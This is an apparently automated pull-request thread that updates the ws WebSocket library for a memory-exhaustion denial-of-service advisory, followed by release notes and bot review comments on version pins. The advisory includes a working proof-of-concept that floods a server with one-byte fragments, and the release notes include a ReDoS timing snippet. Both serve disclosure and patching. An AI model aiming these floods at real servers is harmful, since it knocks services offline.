fix(deps): update dependency ws to v7 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
ws	^6.2.4 → ^7.0.0

---

ws: Memory exhaustion DoS from tiny fragments and data chunks

CVE-2026-48779 / GHSA-96hv-2xvq-fx4p

More information

Details

Impact

A high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM.

Proof of concept

import { WebSocket, WebSocketServer } from 'ws';

const wss = new WebSocketServer({ port: 0 }, function () {
  const data = Buffer.alloc(1);
  const options = { fin: false };
  const { port } = wss.address();
  const ws = new WebSocket(`ws://localhost:${port}`);

  ws.on('open', function () {
    (function send() {
      ws.send(data, options, function (err) {
        if (err) return;
        send();
      });
    })();
  });

  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`client close - code: ${code} reason: ${reason.toString()}`);
  });
});

wss.on('connection', function (ws) {
  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`server close - code: ${code} reason: ${reason.toString()}`);
  });
});

Patches

The vulnerability was fixed in ws@8.21.0 (websockets/ws@bca91ad) and backported to ws@7.5.11 (websockets/ws@fd36cd8), ws@6.2.4 (websockets/ws@86d3e8a), and ws@5.2.5 (websockets/ws@b5372ac).

Workarounds

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

Credits

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

Severity

• CVSS Score: 7.5 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

• https://github.com/websockets/ws/security/advisories/GHSA-96hv-2xvq-fx4p
• https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7
• https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53
• https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94
• https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8
• https://github.com/advisories/GHSA-96hv-2xvq-fx4p

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

websockets/ws (ws)

v7.5.11

Compare Source

Bug fixes

• Backported 2b2abd4 to the 7.x release line (e14c458).

v7.5.10

Compare Source

Bug fixes

• Backported e55e510 to the 7.x release line (22c2876).

v7.5.9

Compare Source

Bug fixes

• Backported bc8bd34 to the 7.x release line (0435e6e).

v7.5.8

Compare Source

Bug fixes

• Backported 0fdcc0a to the 7.x release line (2758ed3).
• Backported d68ba9e to the 7.x release line (dc1781b).

v7.5.7

Compare Source

Bug fixes

• Backported 6946f5f to the 7.x release line (1f72e2e).

v7.5.6

Compare Source

Bug fixes

• Backported b8186dd to the 7.x release line (73dec34).
• Backported ed2b803 to the 7.x release line (22a26af).

v7.5.5

Compare Source

Bug fixes

• Backported ec9377c to the 7.x release line (0e274ac).

v7.5.4

Compare Source

Bug fixes

• Backported 6a72da3 to the 7.x release line (76087fb).
• Backported 869c989 to the 7.x release line (2799793).

v7.5.3

Compare Source

Bug fixes

• The WebSocketServer constructor now throws an error if more than one of the
  noServer, server, and port options are specefied (66e58d2).
• Fixed a bug where a 'close' event was emitted by a WebSocketServer before
  the internal HTTP/S server was actually closed (5a58730).
• Fixed a bug that allowed WebSocket connections to be established after
  WebSocketServer.prototype.close() was called (772236a).

v7.5.2

Compare Source

Bug fixes

• The opening handshake is now aborted if the client receives a
  Sec-WebSocket-Extensions header but no extension was requested or if the
  server indicates an extension not requested by the client (aca94c8).

v7.5.1

Compare Source

Bug fixes

• Fixed an issue that prevented the connection from being closed properly if an
  error occurred simultaneously on both peers (b434b9f).

v7.5.0

Compare Source

Features

• Some errors now have a code property describing the specific type of error
  that has occurred (#​1901).

Bug fixes

• A close frame is now sent to the remote peer if an error (such as a data
  framing error) occurs (8806aa9).
• The close code is now always 1006 if no close frame is received, even if the
  connection is closed due to an error (8806aa9).

v7.4.6

Compare Source

Bug fixes

• Fixed a ReDoS vulnerability (00c425e).

A specially crafted value of the Sec-Websocket-Protocol header could be used
to significantly slow down a ws server.

for (const length of [1000, 2000, 4000, 8000, 16000, 32000]) {
  const value = 'b' + ' '.repeat(length) + 'x';
  const start = process.hrtime.bigint();

  value.trim().split(/ *, */);

  const end = process.hrtime.bigint();

  console.log('length = %d, time = %f ns', length, end - start);
}

The vulnerability was responsibly disclosed along with a fix in private by
Robert McLaughlin from University of California, Santa Barbara.

In vulnerable versions of ws, the issue can be mitigated by reducing the maximum
allowed length of the request headers using the --max-http-header-size=size
and/or the maxHeaderSize options.

v7.4.5

Compare Source

Bug fixes

• UTF-8 validation is now done even if utf-8-validate is not installed
  (23ba6b2).
• Fixed an edge case where websocket.close() and websocket.terminate() did
  not close the connection (67e25ff).

v7.4.4

Compare Source

Bug fixes

• Fixed a bug that could cause the process to crash when using the
  permessage-deflate extension (9277437).

v7.4.3

Compare Source

Bug fixes

• The deflate/inflate stream is now reset instead of reinitialized when context
  takeover is disabled (#​1840).

v7.4.2

Compare Source

Bug fixes

• Silenced a deprecation warning (a2c0d44).

v7.4.1

Compare Source

Bug fixes

• Added a workaround for a double 'error' event bug in Node.js < 13 which
  caused an uncaught error during the WebSocket handshake (38d6ab3).

v7.4.0

Compare Source

Features

• The callback of WebSocketServer.prototype.handleUpgrade() now takes the
  client HTTP GET request as second argument (7d39f19).

Bug fixes

• Read-only properties are now read-only (eabed8f).
• The CONNECTING, OPEN, CLOSING, CLOSED, binaryType, bufferedAmount,
  extensions, onclose, onerror, onmessage, onopen, protocol,
  readyState, and url properties are now enumerable (2069e68).

v7.3.1

Compare Source

Bug fixes

• Improved websocket.bufferedAmount accuracy (e1349c0, a162942).

v7.3.0

Compare Source

Features

• WebSocket.prototype.addEventListener() now supports the once option (#​1754).

v7.2.5

Compare Source

Bug fixes

• Fixed compatibility with Node.js master (651d662).

v7.2.3

Compare Source

Bug fixes

• WebSocket#{p{i,o}ng,close}() now thow an error if the data to send is too
  large to fit in a control frame (e54f08d).

v7.2.2

Compare Source

Bug fixes

• Fixed an issue where calling webSocketStream.end() could cause the process
  to crash (9535702).
• The connection is now closed if a non-masked frame is received on the server
  or a masked frame is received on the client (#​1681).
• The status code 1014 is now allowed to be used (#​1682).

v7.2.1

Compare Source

Bug fixes

• Added bufferutil and utf-8-validate as peer dependencies (#​1626).

v7.2.0

Compare Source

Features

• Added ability to specify the readableObjectMode option when using
  WebSocket.createWebSocketStream() (#​1647).

v7.1.2

Compare Source

Bug fixes

• Fixed a bug that caused compress jobs to never be marked as complete
  (#​1618).

v7.1.1

Compare Source

Bug fixes

• An error is now thrown if the WebSocket server constructor is used
  incorrectly (3641266).

v7.1.0

Compare Source

Features

• Added utility to wrap a WebSocket in a Duplex stream (#​1589).

Bug fixes

• Reverted "[minor] Remove unneeded if statement" (dbacf58, #​1591).

v7.0.1

Compare Source

Bug fixes

• Added ability to disable sending the SNI extension (#​1587).

v7.0.0

Compare Source

Breaking changes

• Dropped support for Node.js 6 (1e6999b).
• Dropped support for url.Url instances in the WebSocket constructor
  (692d7b4).
• The behavior of WebSocket#{p{i,o}ng,send}() has changed when the
  readyState attribute is not OPEN (#​1532)
  • If the readyState attribute is CONNECTING, an exception is thrown.
  • If the readyState attribute is CLOSING or CLOSED
    • The bufferedAmount attribute is increased by the length of the data
      argument in bytes.
    • If provided, the callback function is called with an error.
    • No exception is thrown even if the callback function is not provided.

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • At any time (no schedule defined)
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[coderabbitai]

📝 Walkthrough

Walkthrough

package.json receives a version constraint update: the ws dependency moves from ^6.2.4 to ^7.0.0.

Estimated code review effort

🎯 1 (Trivial) | ⏱️ ~2 minutes

🚥 Pre-merge checks | ✅ 6

✅ Passed checks (6 passed)

Check name	Status	Explanation
Title check	✅ Passed	Title accurately describes the main change: updating the ws dependency to v7 for a documented security vulnerability.
Docstring Coverage	✅ Passed	No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.
Linked Issues check	✅ Passed	Check skipped because no linked issues were found for this pull request.
Out of Scope Changes check	✅ Passed	Check skipped because no linked issues were found for this pull request.
Updates Docs	✅ Passed	This is a security dependency update (ws vulnerability patch), not a feature implementation. Documentation updates are required for new features, not for transitive dependency maintenance.
Description Check	✅ Passed	Check skipped - CodeRabbit’s high-level summary is enabled.

_{✏️ Tip: You can configure your own custom pre-merge checks in the settings.}

---

_{Comment @coderabbitai help to get the list of available commands.}

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 0%. Comparing base (aef728e) to head (83f1b92).
✅ All tests successful. No failed tests found.

Additional details and impacted files

@@     Coverage Diff     @@
##   main   #426   +/-   ##
===========================
===========================

🚀 New features to boost your workflow:

• 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

[coderabbitai]

Actionable comments posted: 1

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)

package.json (1)

2947-2950: 🔒 Security & Privacy | 🔴 Critical

Update ws overrides to v8.21.0 to patch DoS vulnerability (GHSA-96hv-2xvq-fx4p).

Both @deepnote/runtime-core and @jupyterlab/filebrowser override ws to v8.20.1, which is vulnerable to memory exhaustion DoS from tiny fragments and data chunks (CVSS 7.5). The fix is available in v8.21.0. Update both overrides to v8.21.0.

🤖 Prompt for AI Agents

Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@package.json` around lines 2947 - 2950, The ws package override versions for
both "`@deepnote/runtime-core`" and "`@jupyterlab/filebrowser`" are set to 8.20.1,
which contains a DoS vulnerability. Update the "ws" version string from "8.20.1"
to "8.21.0" for both "`@deepnote/runtime-core`" ws override and
"`@jupyterlab/filebrowser`" ws override to apply the security patch.

🤖 Prompt for all review comments with AI agents

Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@package.json`:
- Line 2772: Update the ws package version specifications to address
CVE-2026-48779 vulnerabilities. Change the ws dependency version range from
^7.0.0 to ^7.5.11 to ensure the vulnerable versions 7.0.0 through 7.5.10 are not
installed. Additionally, locate the two pinned ws version specifications set to
8.20.1 and update both to 8.21.0, which contains the necessary security patch
for this CVE.

---

Outside diff comments:
In `@package.json`:
- Around line 2947-2950: The ws package override versions for both
"`@deepnote/runtime-core`" and "`@jupyterlab/filebrowser`" are set to 8.20.1, which
contains a DoS vulnerability. Update the "ws" version string from "8.20.1" to
"8.21.0" for both "`@deepnote/runtime-core`" ws override and
"`@jupyterlab/filebrowser`" ws override to apply the security patch.

🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

• Push a commit to this branch (recommended)
• Create a new PR with the fixes

---

ℹ️ Review info

⚙️ Run configuration

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro

Run ID: 71439103-1877-44cd-8840-fc612f4f90a0

📥 Commits

Reviewing files that changed from the base of the PR and between ac66c74 and b1eee51.

⛔ Files ignored due to path filters (1)

• package-lock.json is excluded by !**/package-lock.json

📒 Files selected for processing (1)

• package.json

[coderabbitai]

🔒 Security & Privacy | 🔴 Critical

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
# Verify ws versions and vulnerability status

# Check available ws versions and identify vulnerable ranges
npm view ws versions --json | jq -r '.[]' | grep -E '^(6\.|7\.|8\.)'

# Check for security advisories
gh api graphql -f query='
{
  securityVulnerabilities(first: 10, ecosystem: NPM, package: "ws") {
    nodes {
      advisory {
        summary
        severity
        identifiers { type value }
      }
      vulnerableVersionRange
      firstPatchedVersion { identifier }
    }
  }
}'

Repository: deepnote/vscode-deepnote

Length of output: 3667

---

Line 2772 uses vulnerable version range; lines 2947 & 2950 require patched ws version.

Setting ws to ^7.0.0 matches 7.0.0 through 7.5.10, all vulnerable to CVE-2026-48779. Use ^7.5.11 instead.

Additionally, lines 2947 and 2950 pin ws to 8.20.1, which is vulnerable to CVE-2026-48779 (fixed in 8.21.0). Update to 8.21.0 per PR objectives.

🤖 Prompt for AI Agents

Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@package.json` at line 2772, Update the ws package version specifications to
address CVE-2026-48779 vulnerabilities. Change the ws dependency version range
from ^7.0.0 to ^7.5.11 to ensure the vulnerable versions 7.0.0 through 7.5.10
are not installed. Additionally, locate the two pinned ws version specifications
set to 8.20.1 and update both to 8.21.0, which contains the necessary security
patch for this CVE.